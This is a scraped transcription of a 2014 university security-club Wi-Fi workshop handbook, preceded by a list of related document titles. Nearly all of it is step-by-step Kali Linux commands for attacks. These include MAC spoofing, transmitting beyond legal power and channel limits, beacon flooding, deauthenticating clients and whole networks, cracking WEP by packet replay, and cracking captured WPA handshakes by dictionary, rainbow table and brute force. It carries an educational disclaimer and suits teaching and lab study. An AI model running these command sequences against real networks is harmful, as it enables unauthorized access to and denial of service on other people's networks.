Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

Similar documents
Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Hacking Encrypted Wireless Network

Section 4 Cracking Encryption and Authentication

Using aircrack and a dictionary to crack a WPA data capture

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

Wireless Network Security

Wireless Attacks and Countermeasures

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

This repository. Insights. Projects 0. Join GitHub today

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY

5 Steps Wifi Hacking Cracking WPA2 Password

Hacking Wireless Networks by data

Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black

Wireless Security Algorithms

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Investigations and Incident Response Using BackTrack

Gaining Access to encrypted networks

Wireless Network Security

Sample Exam Ethical Hacking Foundation

Tutorial: Simple WEP Crack

Is Your Wireless Network Being Hacked?

WIRELESS EVIL TWIN ATTACK

Security of WiFi networks MARCIN TUNIA

CEH Tools. Sniffers. - Wireshark: The most popular packet sniffer with cross platform support.

Obstacle Avoiding Wireless Surveillance Bot

Njepat Wireless Hacking Tools V1 User Guide Document Version : 1.0 Tested On Backtrack 5R3 - Gnome Coded By : Xsan-Lahci idea name : 4J4l 13

CyberP3i Hands-on Lab Series

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Ethical Hacking and Prevention

Wireless Attacks and Defense. By: Dan Schade. April 9, 2006

Chapter 5 Local Area Networks. Computer Concepts 2013

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne

Wireless technology Principles of Security

SharkFest'17 US. Basic workshop of. IEEE packet dissection. Megumi Takeshita

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System

ISC. 10 October George Wong

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology

802.11g PC Card/USB Wireless Adapter

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

PRODUCT GUIDE Wireless Intrusion Prevention Systems

How to configure a Point-to-Multipoint link

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft

GETTING THE MOST OUT OF EVIL TWIN

Wireless LAN Access Point

BackTrack 5 Wireless Penetration Testing

Nomadic Communications Labs

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

Nomadic Communications Labs. Alessandro Villani

11N Wireless USB Adapter User Guide

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

Chapter 24 Wireless Network Security

Hacking with Python. Your Guide to Ethical Hacking, Basic Security, Penetration Testing, and Python Hacking. Hacking Made Easy

Hooray, w Is Ratified... So, What Does it Mean for Your WLAN?

A Division of Cisco Systems, Inc. GHz 2, g. Wireless-G. User Guide. Access Point WIRELESS WAP54G (EU/LA/UK) Model No.

802.11b+g Wireless LAN USB Adapter. User Manual

Wireless Network Security

Frequently Asked Questions WPA2 Vulnerability (KRACK)

Wireless Networking. Dennis Rex SCALE 3X

1.0 Basic RF Characteristics (15%) 1.1 Describe RF signal characteristics Frequency Amplitude Phase 1.1.

Wi-Fi: a security overview

WL-1100SD Wireless b SD Card

ECE 435 Network Engineering Lecture 8

How to configure a Point-to-Point link

ISDP 2018 Industry Skill Development Program In association with

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

What is Eavedropping?

NETWORK SECURITY. Ch. 3: Network Attacks

Wireless LAN USB Adaptor WL-2111 Quick Installation Guide V.1.0

Learn How to Configure EnGenius Wi-Fi Products for Popular Applications

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year

EAPeak - Wireless 802.1X EAP Identification and Foot Printing Tool. Matt Neely and Spencer McIntyre

WI-FI HUB+ TROUBLESHOOTING GUIDE

VLANs and Association Redirection. Jon Ellch

U S E R M A N U A L b/g PC CARD

Penetration Testing with Kali Linux

Appendix E Wireless Networking Basics

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2

CE MARK WARNING LIMITED WARRANTY

Managing Rogue Devices

A Division of Cisco Systems, Inc. GHz g. Wireless-G. USB Network Adapter. User Guide WIRELESS WUSB54G. Model No.

Network Security. Security in local-area networks. Radboud University Nijmegen, The Netherlands. Autumn 2014

Configuring Layer2 Security

Encrypted WiFi packet injection and circumventing wireless intrusion prevention systems

ProbeQuest Documentation

Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal

WIDS Technology White Paper

Network Encryption 3 4/20/17

Wireless Hacking How to Hack Wireless Networks Beginner s Guide

WUG2690 User s Manual

Managing Rogue Devices

Wireless Networking Basics. Ed Crowley

ETHICAL HACKING & COMPUTER FORENSIC SECURITY

Wireless LANs. ITS 413 Internet Technologies and Applications

Procedure: You can find the problem sheet on the Desktop of the lab PCs.

Transcription:

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook 1

2

The information provided in this manual is to be used for educational purposes only. The authors are in no way responsible for any misuse of the information provided. All of the information in this manual is meant to help the reader develop a Wi-Fi hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Any hacking discussed in this manual should be regarded as Ethical hacking. You implement the information given at your own risk. By reading these tutorials given in this manual, you agree that this tutorial is intended for educational purposes only and the author cannot be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other, creative application of this tutorial. In any case you disagree with the above statement, stop here. *Note-All images, programs, and steps in this manual were tested and performed with 32-bit Kali Linux version 1.0.6 live iso downloaded from http://www.kali.org installed to a USB flash drive with YUMI-Multiboot USB Creator available from http://www.pendrivelinux.com and an Alfa AWUSO36H USB wireless adapter on a laptop computer with an internal wireless card and an internal Ethernet card. Any statement starting with a # character is meant to be run in the terminal. Each section of this manual is starting as if you just freshly booted into Kali. You may not need to do the first steps in a section if you have already done work since booting your computer. Two examples of this would be opening the terminal and starting monitor mode on wlan1 so that you now have a mon0 interface. When text appears in quotes that means not to type it verbatim, but rather substitute something for the text in the quotes. For Example password means to type what you want the password to be. 3

4

Table of Contents Terms and Definitions.. 7 Getting to know Kali Linux 9 Initial Computer Setup.10 Tools Used in this manual..11 Finding the correct Wireless adapter. 13 Finding your MAC address...14 Specifically changing your MAC address..15 Randomly changing your MAC address 17 Changing your MAC address back the factory address.19 Changing the channel of your wireless card. 20 Operating Wi-Fi outside US regulation frequencies...21 Operating your wireless card with more power......23 Finding the modes your wireless card supports.25 Operating your card in ad-hoc mode. 26 Operating your card in monitor mode..28 Data gathering in monitor mode..29 Beacon Flooding 31 Viewing Probe Requests..33 Passive Network Scan 35 Active Network Scan..37 5

Directed Client Deauthentication 38 Directed Network Deauthentication.. 40 Multiple Network Deauthentication..42 Forced connection to a specific access point 44 Breaking WEP Encryption 46 Breaking WPA Encryption with a dictionary list.50 Breaking WPA Encryption with a rainbow table.54 Computing personalized Rainbow Tables 58 Breaking WPA Encryption by brute force 60 Charts and Figures 64 6

Terms and Definitions Access Point(AP)- a device that allows wireless devices to connect to a wired network using Wi-Fi Bandwidth-The difference between the upper and lower frequencies in a continuous set of frequencies. Channel-A pre-defined number assigned to a specific center frequency and bandwidth within the frequency range that Wi-Fi operates within. Within the US, channels 1-11 are available for use at higher powers. Evil Twin- A rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. Frequency- A rate of oscillation which corresponds to radio waves and the alternating currents which carry radio signals. Honeypot-A wireless access point intentionally set up to allow people to connect to it for reasons of monitoring traffic or other malicious reasons. IEEE 802.11- A set of media access control and physical layer specifications for implementing wireless local area network computer communication in the 2.4GHz, 3.6GHz, 5GHz, 60 GHz, and tv white space frequency bands. IP Address- A numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication. ISM Band- Radio bands reserved internationally for the use of radio frequency energy for industrial, scientific and medical purposes other than telecommunications. Despite the intent of the original allocations, and because there are multiple allocations, in recent years the fastest-growing uses of these bands have been for short-range, low power communications systems. MAC Address- A unique identifier assigned to network interfaces for communications on the physical network segment. Modes-Different ways that the wireless card can function. These modes include master, managed, ad-hoc, mesh, repeater, and monitor. Master mode is used by wireless access points. Managed mode is used by clients to 7

connect to a wireless network. Ad-hoc is used for creating a network directly between clients. Mesh mode is used in commercial applications to create ad-hoc networks between access points. Repeater mode is used to boost the range of a wireless access point. Monitor mode is used when wishing to view traffic that was not meant for your computer. NIC-Short for network interface card. A computer hardware component that connects a computer to a computer network. Packet- A formatted unit of data carried by a packet-switched network. A packet consists of two kinds of data: control information and user data (also known as payload). The control information provides data the network needs to deliver the user data, for example: source and destination network addresses, error detection codes, and sequencing information. Typically, control information is found in packet headers and trailers, with payload data in between. Rainbow Table- A pre-computed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters. WEP- Wired Equivalent Privacy. An easily broken security algorithm for IEEE 802.11 wireless networks introduced in 1999. Wi-Fi-The trademarked name from the Wi-Fi Alliance for a popular technology that allows the wireless transfer of data based upon the IEEE 802.11 standard. WPA- Wi-Fi Protected Access. A security protocol and security certification program developed by the Wi-Fi alliance to secure wireless networks. WPA was designed to take the place of WEP. WPA2- Wi-Fi Protected Access II. A security protocol and security certification program developed by the Wi-Fi alliance to secure wireless networks. WPA2 was designed to take the place of WPA. 8

Getting to know Kali Linux Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack, their previous forensics Linux distribution. In addition to Kali Linux, Offensive Security also maintains the Exploit Database and the free online course, Metasploit Unleashed. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Users may run Kali Linux from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project s Metasploit Framework, a tool for developing and executing security exploits. Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, as well as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung s ARM Chromebook. 9

Initial Computer Setup 1. With the computer off plug in the USB flash drive with kali linux installed as well as the USB alfa wireless card. 2. Turn on the computer and boot off of the USB. The will vary upon computer manufacturer, but there will a button to press before your computer boots off of the internal hard drive. 3. You should be brought to the YUMI multiboot USB start page. Using the arrow keys select System Tools -> and hit enter. 4. You should be brought into the Systems Tools page of YUMI. Using the arrow keys select kali-linux-1.0.6-i386 and hit enter. 5. You should be brought to the Kali Linux Boot menu. Using the arrow keys select Live (686-pae) and hit enter. Your computer is now booting off of the USB drive in a live mode. This means that nothing is being written to the hard drive and in fact you could do this without a hard drive even installed. 6. You should now be booted into kali linux and sitting at the desktop. It is to be noted that by default, kali runs in a single user environment meaning that you are the root(admin). If kali is left alone for a set amount of time it will lock the screen and the password for the root account is toor. 7. In order to enable the wireless cards, you must turn off airplane mode which is enabled by default. Click Applications Systems Tools Preferences System Settings. From the System settings select Network and then click on the Airplane Mode toggle switch to make sure it is off. 8. Your computer is now ready to proceed through this manual. 10

Tools used in this manual aircrack-ng o http://www.aircrack-ng.org o A network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks aireplay-ng o http://www.aircrack-ng.org/doku.php?id=aireplay-ng o Used to inject frames and generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. airmon-ng o http://www.aircrack-ng.org/doku.php?id=airmon-ng o This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. airodump-ng o http://www.aircrack-ng.org/doku.php?id=airodump-ng o Is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP Ivs (Initialization Vector) for the intent of using them with aircrack-ng. Jasager-karma o http://www.digininja.org/jasager/ o KARMA enabled access points passively listen to any client wireless requests and then responds to it with the SSID that the client probed for and thus impersonating virtually any Access Point. Kali Linux o http://www.kali.org/ o A Debian-derived Linux distribution designed for digital forensics and penetration testing. mdk3 o http://homepages.tu-darmstadt.de/~p_larbig/wlan/ 11

o A program that uses the osdep injection library from the aircrack-ng project. Used for packet injection as well as numerous other Wi-Fi related attacks such as a wireless DDOS(directed denial of service) attack. tshark o http://www.wireshark.org/ o An open-source packet analyzer used for network troubleshooting, analysis, software and communication protocol development, and education. 12

1. Open the terminal Finding the correct wireless adapter 2. type #airmon-ng and hit enter 3. The interface with the realtek RTL8187L is the interface that you want to use. In this case that interface is wlan1 because there is already an internal wireless card which is wlan0. Your situation may be different and substitute the correct interface on your own computer when wlan1 is used in this manual. 13

Finding your MAC address 1. Open the terminal 2. Type #ifconfig wlan1 14

Specifically changing your MAC address 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type one of the following #ifconfig wlan1 hw ether de:ad:be:ef:c0:fe #macchanger m de:ad:be:ef:c0:fe wlan1 15

4. Type # ifconfig wlan1 up 5. Type #ifconfig wlan1 ****Notice that the MAC address is now different than if you were to run this command when the computer if first booted. 16

Randomly Changing your MAC Address 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type one of the following #ifconfig wlan1 hw ether 96:de:3a:c5:3a:74 #macchanger r wlan1 Specific Random Computer Random 17

4. Type #ifconfig wlan1 up 5. Type #ifconfig wlan1 ****Notice that the MAC address is now different than if you were to run this command when the computer if first booted. 18

Changing your MAC address back to factory original 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type #macchanger p wlan1 4. Type #ifconfig wlan1 up 5. Type #ifconfig wlan1 19

Changing the Channel of your wireless card 1. Open the terminal 2. Type #iwconfig wlan1 3. Type #iwconfig wlan1 channel c c is the channel you wish to set 4. Type #iwconfig wlan1 ****Notice that a Frequency section has been added and will change depending upon what channel you entered. 20

Operating Wi-Fi outside US regulation frequencies 1. Open the terminal 2. Type #iw reg get 3. Type #iw reg set JP 4. Type #iw reg get 21

5. Type #iwconfig wlan1 channel c c is the channel you wish to use 1-14 6. Type #iwconfig wlan1 ****Notice that the frequency corresponds to channel 14 which is normally not available for use in the United States and is only used in Japan. This holds true for channel 12 and 13 which are not used with higher power in the US. 22

Operating your wireless card with more power 1. Open the terminal 2. Type #iwconfig wlan1 3. Type #iw reg set BO 4. Type #iwconfig wlan1 txpower 30 23

5. Type #iwconfig wlan1 ****Notice that the Tx-Power has changed from 20 dbm to 30dBm. This is a change from.1 Watt to 1 Watt. The FCC regulation on ERP(Effective Radiated Power) depends on the use of the wireless link. A point to point wireless connection can have a greater ERP than a point to multipoint wireless link. 24

Finding the modes your wireless card supports 1. Open the terminal 2. Type #airmon-ng 3. Type #iw phy phy0 info grep A3 modes Notice that phy0 is the Realtek RTL8187L, this may vary on your computer. 25

Operating your wireless card in ad-hoc mode Step 6 is optional as it enables WEP security. 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type #iwconfig wlan1 mode ad-hoc 4. Type #iwconfig wlan1 channel 1 5. Type #iwconfig wlan1 essid nameofnetwork 26

6. Type #iwconfig wlan1 key s: password note that the password must work out to be 10 or 26 hexadecimal numbers. This is equivalent to 5 or 13 characters. 7. Type #ifconfig wlan1 up 8. Type #iwconfig wlan1 27

Operating your card in monitor mode 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #iwconfig ****Notice that a new Interface has been created, mon0. 28

1. Open the terminal Data gathering in monitor mode 2. Type #airmon-ng start wlan1 3. Type #tshark i mon0 29

You should see something similar to this This is every packet being sent across the given channel 4. Type ctrl-c to end 5. Type #airodump-ng mon0 You should see something similar to this The top section shows access points while the bottom shows client computers. 6. Type ctrl-c to end 30

Beacon Flooding Beacons are a type of 802.11 (Wi-Fi) management frames. They are transmitted periodically by an access point to announce its presence and contain all of the information about a network (name, speeds, encryption type, etc). We are able to send these packets even though a network does not exist. 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #nano ssidlist 31

4. Add different network names on new lines 5. Hit ctrl-x then y then enter when done entering network names 6. Type #mdk3 mon0 b -f ssidlist 7. Hit ctrl-c to quit when done sending beacons ****You can view these networks on a computer, but you cannot connect to them since they are not real. 32

1. Open the terminal Viewing Probe Requests 2. Type #airmon-ng start wlan1 33

3. Type #airodump-ng mon0 4. Type ctrl-c to stop ****Notice that this section of output is at the very bottom of the screen. If many access points are within range, you might have to zoom out while the program is running and then zoom back in after stopping it. The text zoom option is available from the view menu at the top of the screen. 34

Passive Network Scan 1. Open the terminal 2. Type #airmon-ng start wlan1 35

36 3. Type #iw dev wlan1 scan passive grep SSID

1. Open the terminal Active Network Scan 2. Type #airmon-ng start wlan1 3. Type #iwlist wlan1 scan grep ESSID 37

1. Open the terminal Directed Client Deauthentication 2. Type #airmon-ng start wlan1 38

3. Type #airodump-ng mon0 This is when a target is chosen The BSSID is the AP MAC and the STATION is the client MAC The ESSID is the network name and the number under CH is the channel. 4. Type ctrl-c to quit 5. Type #iwconfig mon0 channel 11 11 is the channel of the AP from above 6. Type #aireplay-ng ignore-negative-one -0 10 -a AP MAC -c Client MAC mon0 39

1. Open the terminal Directed Network Deauthentication 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 Choose your target network 4. Type ctrl-c when finished 40

5. Type #nano blacklist put the target network s MAC address on separate lines 6. Type crtl-x, Y, enter 7. Type #mdk3 mon0 d -b blacklist -c 11 11 is the channel of the access point 8. Type ctrl-c to stop 41

1. Open the terminal Multiple Network Deauthentication 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 choose your target networks 4. Type crtl-c when finished 42

5. Type #nano blacklist Put the target networks MAC addresses on separate lines 6. Type ctrl-x, Y, enter 7. Type #mdk3 mon0 d -b blacklist -c 6,11 6 and 11 are the channels of access points 8. Type ctrl-c to stop 43

Forced connection to a specific access point 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 This is the AP that will be accessible 4. Type ctrl-c when finished finding the AP info 44

5. Type #nano whitelist 6. Type ctrl-x, Y, enter when finished 7. Type #mdk3 mon0 d w whitelist 8. Type ctrl-c to stop 45

1. Open the terminal Breaking WEP Encryption 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 4. Type ctrl-c when a network has been found 46

5. Type #airodump-ng c 6 w acm_wep --bssid 12:18:0A:21:AE:E4 mon0 6. Open a new tab in terminal(file new tab) 7. Type #aireplay-ng --ignore-negative-one -1 0 a 12:18:0A:21:AE:E4 h 00:C0:CA:75:6F:AB mon0 8. Type #aireplay-ng --ignore-negative-one -3 b 12:18:0A:21:AE:E4 h 00:C0:CA:75:6F:AB mon0 47

9. Go back to the first tab and wait until the number in the #Data column reaches 40000. Note that this is not a set number due to the statistical analysis that goes into breaking the key and can vary greatly depending upon the length of the key and several other factors. In this case it worked with ~55000. 10. Open a new tab in terminal(file new tab) 11. Type #aircrack-ng b 12:18:0A:21:AE:E4 acm_wep-01.cap 12. If not successful try again after the #Data column reaches the suggested number 48

13. When successful you will see the a message similar to below 14. Go to each of the other tabs and type ctrl-c to stop the running program. 49

Breaking WPA Encryption with a dictionary list 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 50

4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 51

8. Type #iwconfig mon0 channel 11 9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 11. Make sure your dictionary file in the same directory as your.cap file 52

12. Type #aircrack-ng acm_dictionary-01.cap w english.txt 53

Breaking WPA Encryption with a Rainbow Table 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 54

4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 55

8. Type #iwconfig mon0 channel 11 9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 11. Make sure your rainbow table file in the same directory as your.cap file 56

12. Type #cowpatty -r acm_dictionary-01.cap d acm_dictionary_hash s acm_dictionary 57

1. Open the terminal Computing personalized Rainbow Tables 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 58

4. Type ctrl-c when finished finding the target 5. Make sure your dictionary file is in your current file directory 6. Type #genpmk -f English.txt -d acm_dictionary_hash -s acm_dictionary 7. When the program finishes running the rainbow table will be saved in the current directory 59

1. Open the terminal Breaking WPA Encryption by brute force 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 60

4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 61

8. Type #iwconfig mon0 channel 11 9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 62

Type #john -stdout -incremental:all aircrack-ng -b 00:1a:c4:51:3c:31 -w acm_dictionary-01.cap 11. Now you wait until the program has cracked the password. The given method will eventually break every password but would take an extremely long time. There are optimizations that could be made, for example if the length of the key was known. In making this manual, I did not wait until completion because of time constraints. 63

Charts and Figures Wi-Fi channels in the 2.4Ghz band and 5Ghz Band 802.11 Standards 64

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback